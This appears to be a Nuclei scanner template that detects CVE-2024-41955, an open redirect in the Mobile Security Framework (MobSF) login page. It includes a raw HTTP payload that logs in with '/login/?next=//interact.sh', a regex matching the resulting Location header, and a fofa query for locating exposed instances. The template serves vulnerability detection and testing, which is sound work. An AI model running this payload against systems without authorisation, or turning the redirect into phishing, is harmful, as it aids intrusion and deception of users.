id: CVE-2024-41955 info: name: Open Redirect in Login Redirect - MobSF author: Farish severity: medium description: | Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view. impact: | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. reference: - https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/fdaad81314f393d324c1ede79627e9d47986c8c8 - https://nvd.nist.gov/vuln/detail/CVE-2024-41955 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41955 - https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8m9j-2f32-2vx4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N cvss-score: 5.2 cve-id: CVE-2024-41955 cwe-id: CWE-601 metadata: max-request: 1 vendor: Mobile Security Framework (MobSF) product: Mobile Security Framework (MobSF) fofa-query: "MobSF" tags: cve,cve2024,open-redirect,mobsf,authenticated http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /login/?next=//interact.sh HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} host-redirects: true matchers: - type: regex part: header_2 regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'